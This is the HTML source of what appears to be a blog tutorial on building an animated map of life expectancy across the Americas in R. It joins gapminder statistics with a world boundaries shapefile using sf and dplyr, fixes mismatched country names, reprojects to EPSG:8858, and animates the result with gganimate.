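data(&amp;#34;gapminder_unfiltered&amp;#34;, package = &amp;#34;gapminder&amp;#34;)

# Years covered by the 5-year steps: 1952, 1957, ..., 2007
keep_years = seq(1952, 2007, by = 5)

# Hypothetical name: keep only the rows that fall on one of those years
gapminder_5yr = gapminder_unfiltered |&amp;gt;
  filter(year %in% keep_years)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;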
&lt;p&gt;A shapefile (&lt;code&gt;*.shp&lt;/code&gt;) containing the geographical boundaries of each
country can be imported using the &lt;a href="https://r-spatial.github.io/sf/" rel="external"&gt;&lt;code&gt;{sf}&lt;/code&gt;&lt;/a&gt; R package.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(sf)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(dplyr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#d2a8ff;font-weight:bold"&gt;getwd&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;/home/osheen/corporate-website&amp;#34;&lt;/span&gt;){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; world &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_read&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;content/blog/2025-animated-map/data/world-administrative-boundaries.shp&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;continent&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;} &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; world &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_read&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/world-administrative-boundaries.shp&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;continent&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## Reading layer `world-administrative-boundaries' from data source
## `/home/osheen/corporate-website/content/blog/2025-animated-map/data/world-administrative-boundaries.shp'
## using driver `ESRI Shapefile'
## Simple feature collection with 256 features and 8 fields
## Geometry type: MULTIPOLYGON
## Dimension: XY
## Bounding box: xmin: -180 ymin: -58.49861 xmax: 180 ymax: 83.6236
## Geodetic CRS: WGS 84
&lt;/code&gt;&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(world)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## Simple feature collection with 6 features and 7 fields
## Geometry type: MULTIPOLYGON
## Dimension: XY
## Bounding box: xmin: -58.43861 ymin: -34.94382 xmax: 148.8519 ymax: 51.09111
## Geodetic CRS: WGS 84
## iso3 status color_code name
## 1 MNP US Territory USA Northern Mariana Islands
## 2 &amp;lt;NA&amp;gt; Sovereignty unsettled RUS Kuril Islands
## 3 FRA Member State FRA France
## 4 SRB Member State SRB Serbia
## 5 URY Member State URY Uruguay
## 6 GUM US Non-Self-Governing Territory GUM Guam
## region iso_3166_1_ french_shor
## 1 Micronesia MP Northern Mariana Islands
## 2 Eastern Asia &amp;lt;NA&amp;gt; Kuril Islands
## 3 Western Europe FR France
## 4 Southern Europe RS Serbie
## 5 South America UY Uruguay
## 6 Micronesia GU Guam
## geometry
## 1 MULTIPOLYGON (((145.6333 14...
## 2 MULTIPOLYGON (((146.6827 43...
## 3 MULTIPOLYGON (((9.4475 42.6...
## 4 MULTIPOLYGON (((20.26102 46...
## 5 MULTIPOLYGON (((-53.3743 -3...
## 6 MULTIPOLYGON (((144.7094 13...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;One of the nice things about the &lt;code&gt;{sf}&lt;/code&gt; package is that it stores
geographical data in a specialised data-frame structure which allows us
to merge our boundary data with the gapminder statistics using the same
functions that we would use to combine more typical data-frames. Here we
join the two datasets, matching the entries by country name, using the
&lt;a href="url"&gt;dplyr&lt;/a&gt; &lt;code&gt;left_join&lt;/code&gt; function.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;joined &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;left_join&lt;/span&gt;(gapminder_unfiltered,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; world,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; by &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;country&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;name&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_as_sf&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(joined)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## Simple feature collection with 6 features and 12 fields
## Geometry type: MULTIPOLYGON
## Dimension: XY
## Bounding box: xmin: 60.50417 ymin: 29.40611 xmax: 74.91574 ymax: 38.47198
## Geodetic CRS: WGS 84
## # A tibble: 6 × 13
## country continent year lifeExp pop gdpPercap iso3 status color_code
## &amp;lt;chr&amp;gt; &amp;lt;fct&amp;gt; &amp;lt;int&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;int&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt;
## 1 Afghanistan Asia 1952 28.8 8425333 779. AFG Membe… AFG
## 2 Afghanistan Asia 1957 30.3 9240934 821. AFG Membe… AFG
## 3 Afghanistan Asia 1962 32.0 10267083 853. AFG Membe… AFG
## 4 Afghanistan Asia 1967 34.0 11537966 836. AFG Membe… AFG
## 5 Afghanistan Asia 1972 36.1 13079460 740. AFG Membe… AFG
## 6 Afghanistan Asia 1977 38.4 14880372 786. AFG Membe… AFG
## # ℹ 4 more variables: region &amp;lt;chr&amp;gt;, iso_3166_1_ &amp;lt;chr&amp;gt;, french_shor &amp;lt;chr&amp;gt;,
## # geometry &amp;lt;MULTIPOLYGON [°]&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-animated-map"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;I am going to select the country column and plot that using the base R
&lt;code&gt;plot&lt;/code&gt; function for a quick visualisation.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;joined &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;country&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/animated-map/img/first-plotunnamed-chunk-5-1.png" alt="Map of the World with some countries missing." width="672" /&gt;
&lt;p&gt;Hmm, that doesn’t look quite right, does it?&lt;/p&gt;
&lt;p&gt;The issue here is a common one when grabbing a spatial boundaries file
from the internet. The datasets being joined have different names for
some of the countries. For example, in the &lt;code&gt;world&lt;/code&gt; data the USA appears as
‘United States of America’, whereas in &lt;code&gt;gapminder&lt;/code&gt; it’s ‘United States’.
The &lt;code&gt;dplyr::anti_join&lt;/code&gt; function can be helpful for finding countries that
don’t match. I will use &lt;code&gt;fct_recode&lt;/code&gt; from {forcats} to align the &lt;code&gt;world&lt;/code&gt;
country names with &lt;code&gt;gapminder&lt;/code&gt;. In the example below, I am just fixing
the USA, but you can see from the plot above that several other countries
need to be recoded (19 in total). I am doing this behind the scenes to
avoid clogging up the page.&lt;/p&gt;
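&lt;p&gt;Before the recode itself, here is a small sketch of how &lt;code&gt;anti_join&lt;/code&gt; can surface the mismatches. It uses two toy tibbles with made-up rows (&lt;code&gt;stats&lt;/code&gt; and &lt;code&gt;boundaries&lt;/code&gt; are hypothetical stand-ins, not objects from this post). With the real data you would pass &lt;code&gt;gapminder_unfiltered&lt;/code&gt; and &lt;code&gt;st_drop_geometry(world)&lt;/code&gt; instead.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(dplyr)

# Toy stand-ins for the two datasets (made-up rows, for illustration only)
stats = tibble(country = c(&amp;#34;Canada&amp;#34;, &amp;#34;United States&amp;#34;, &amp;#34;Uruguay&amp;#34;))
boundaries = tibble(name = c(&amp;#34;Canada&amp;#34;, &amp;#34;United States of America&amp;#34;, &amp;#34;Uruguay&amp;#34;))

# Rows of `stats` whose country has no matching name in `boundaries`
unmatched = anti_join(stats, boundaries, by = c(&amp;#34;country&amp;#34; = &amp;#34;name&amp;#34;))
unmatched
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In this toy case the only row returned is ‘United States’, which is the kind of name that then needs recoding. The recode for the USA follows.&lt;/p&gt;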
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(forcats)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;world &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; world &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fct_recode&lt;/span&gt;(.data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;United States&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;United States of America&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Okay, let’s see what this looks like now, after re-running the join with the recoded names.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;joined &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;country&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/animated-map/img/full-plotunnamed-chunk-8-1.png" alt="Map of the World with all countries." width="672" /&gt;
&lt;p&gt;That’s better! Now I’ve got the data I want to plot, I can use ggplot2
to start creating the visualisation that I will be animating. Before
that, I will filter the data to keep only the Americas, then use
&lt;code&gt;geom_sf&lt;/code&gt; to plot the geometry data.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(ggplot2)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;americas &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; joined &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(continent &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Americas&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;americas_plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(americas) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_sf&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/animated-map/img/americas-plot.png" class="image-center" style="width: 450px;" alt = "Map of The Americas."/&gt;
&lt;p&gt;This plot looks good but I’m going to change the coordinate reference
system (CRS) to one (“EPSG:8858”) that is designed for the Americas. I
found this CRS on &lt;a href="https://epsg.io/" rel="external"&gt;epsg.io&lt;/a&gt;, a website I would
recommend if you are looking for a different CRS. &lt;code&gt;st_transform&lt;/code&gt;
can be used to change the CRS to EPSG:8858. This is what it looks like
now:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;americas &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_transform&lt;/span&gt;(americas, &lt;span style="color:#a5d6ff"&gt;&amp;#34;EPSG:8858&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;new_crs_plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(americas) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_sf&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/animated-map/img/new-crs-plot.png" class="image-center" style="width: 450px;" alt = "Map of The Americas with EPSG:8858 CRS."/&gt;
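&lt;p&gt;If you want to confirm that a transformation has taken effect, one option is to inspect the CRS before and after. The sketch below does this on a single made-up point rather than the &lt;code&gt;americas&lt;/code&gt; data, so it runs on its own; &lt;code&gt;pt&lt;/code&gt; and &lt;code&gt;pt_ee&lt;/code&gt; are hypothetical names, and it assumes your PROJ installation knows about EPSG:8858.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(sf)

# A single longitude/latitude point in WGS 84 (made up, for illustration only)
pt = st_sfc(st_point(c(-58.4, -34.6)), crs = &amp;#34;EPSG:4326&amp;#34;)

# WGS 84 is a geographic (longitude/latitude) CRS
st_is_longlat(pt)

# Reproject to the CRS used in this post
pt_ee = st_transform(pt, &amp;#34;EPSG:8858&amp;#34;)

# The projected CRS is no longer longitude/latitude
st_is_longlat(pt_ee)

# Print the full CRS definition
st_crs(pt_ee)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;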
&lt;p&gt;Okay, now that the plot looks right, we will start preparing it to be
animated.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(ggplot2)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; americas &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(year &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2007&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_sf&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; lifeExp)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Year: 2007&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Life Expectancy&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_void&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ggplot2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_fill_viridis_b&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;inside&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.position.inside &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.23&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.23&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;15&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; hjust &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.border &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_rect&lt;/span&gt;(color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/animated-map/img/static-plot.png" class="image-center" style="width: 450px;" alt = "Map of The Americas to be animated."/&gt;
&lt;p&gt;This is the plot we are going to animate, and for that we’ll use {gganimate}.
The &lt;code&gt;transition_states&lt;/code&gt; function partitions the data using a &lt;code&gt;states&lt;/code&gt;
column (here our ‘year’ column), iteratively creating a frame of the
animation for each year value in the input data. The next function is
&lt;code&gt;animate&lt;/code&gt;, which will convert these frames into a GIF. Note: make sure
you have a GIF renderer such as {gifski} installed, or you may end up with 100 PNG files
in your working directory rather than a GIF!&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(gganimate)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;animation &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggtitle&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Year: {closest_state}&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;transition_states&lt;/span&gt;(states &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;animate&lt;/span&gt;(animation,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; renderer &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gifski_renderer&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;img/map.gif&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; alt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Animation with missing values.&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/animated-map/img/map.gif" class="image-center" style="width: 450px;" alt = "Animation with missing values."/&gt;
&lt;p&gt;The keen-eyed among you will notice that some countries don’t have a
value for every year.&lt;/p&gt;
